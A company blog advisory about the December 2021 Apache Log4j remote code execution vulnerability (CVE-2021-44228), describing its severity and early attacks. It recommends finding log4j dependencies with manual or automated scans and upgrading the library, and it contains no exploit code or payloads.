Log4j Vulnerability
NIST has announced a zero-day global vulnerability (CVE-2021-44228) in the Apache Log4j logging library.
The Apache Log4j utility is a popular and commonly used component for logging services. On December 9, 2021, a vulnerability was reported that could allow a system running Apache Log4j version 2.14.1 or below to be compromised and allow an attacker to execute any code they choose.
Why this is Important
This could be the most serious vulnerability ever discovered and has a rating of 10/10 on the CVSS scale, which is as bad as it gets. It is a remote code execution (RCE) vulnerability, easy to exploit, and once access is gained it allows attackers to run arbitrary code and install malicious software, exfiltration of sensitive data, and take control of your machine.
“one of the most serious I’ve seen in my entire career, if not the most serious” – Top U.S. cybersecurity defense official, Jen Easterly.
Apache Log4j is a Java-based logging utility and is part of the Apache Logging Services, a project of the Apache Software Foundation and is a widely used open-source software that is interconnected to many applications and services and is commonly used by commercial software developers. Everything from enterprise control systems, vehicle navigation, to web servers and consumer electronics is at risk. It is installed across platforms such as Windows, Linux, Apple’s macOS. The challenge is that identifying which systems may be compromised can be difficult as it is often hidden under layers of other software or undocumented folders.
Cybercriminals have developed malware that allows attackers to hijack computers for large-scale assaults on network infrastructure, while other attackers have installed software to mine cryptocurrency on compromised systems.
What to Expect in the Coming Days, Weeks, Months
Since this logging software is used across the internet, the impact is expected to be wide-spread. At the time of this posting, there are active and ongoing attempts to exploit this vulnerability and the attacks are expected to continue.
One of the first attacks using the vulnerability involved the 3D world-building game Minecraft. Cybercriminals were able to take control of one of the servers before Microsoft, which owns Minecraft, could address and patch the flaw. This type of bug is called a zero-day vulnerability where security professionals had not developed a patch before it became known and potentially exploitable.
Similar attacks should be expected to surface soon. Much of the tech industry is working around the clock to develop patches before the vulnerability could be exploited by cybercriminals. The US government has warned companies to be aware that there may be cyber attacks over the holidays and to examine their current cybersecurity posture and implement best practices and mitigations to manage the risk posed by cyber threats.
The broad impact of this vulnerability is far-reaching, the log4j vulnerability even affects the Mars rover, and will affect the internet, networks, and machines for years to come. Attacks that can leverage ransomware or other attack types that will be exploited by malicious hacker nations may come soon leaving all on high alert.
How to Detect, Mitigate, and Next Steps
This critical vulnerability requires immediate action. Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 are vulnerable. If you’re running a version of this, you need to upgrade to the latest version urgently, where this vulnerability has been addressed. More details can be found on the [nvd.nist.gov] website.
At Crest Data, we are actively helping our customers to address this vulnerability and would like to share our learnings so you can perform similar measures in your own environment.
Detect:
There are two methods that you can use immediately to detect if your system is compromised,
Manual – Scan through the source code of your product to find the log4j library or 3rd party libraries that use the log4j internally.
Automated – Use OSS scan tools (like WhiteSource, Snyk) to scan the source code of the product and detect the log4j dependencies.
Mitigate:
Mitigate future attacks and exploitations of this flaw by performing the below,
Upgrade the log4j library if being used in the source code of your product to its latest version (v2.16.0)
If log4j library is being used internally in any 3rd party library being leveraged in the source code of your product, upgrade the 3rd party library to its latest version which uses the log4j v2.16.0
Recommended Next steps:
Scan the source code of your product with OSS scan tools (WhiteSource, Snyk) to make sure the integration is free of any vulnerabilities
Upgrade to the newer version of the product where this vulnerability potentially has been patched
Crest Data is proactively engaging with customers to ensure we mitigate the risk and provide additional information as the situation evolves. We upgraded all our apps in a record-breaking short amount of time in order to secure our customer’s environment. We actively scanned all our apps and identified the affected components and working with our customers to ensure the remediation steps are taken to resolve this issue.
Please contact Crest Data support for any questions or further assistance with applying the mitigation steps described above.
Learn More and Stay On Top of Updates
Start with these resources for updates,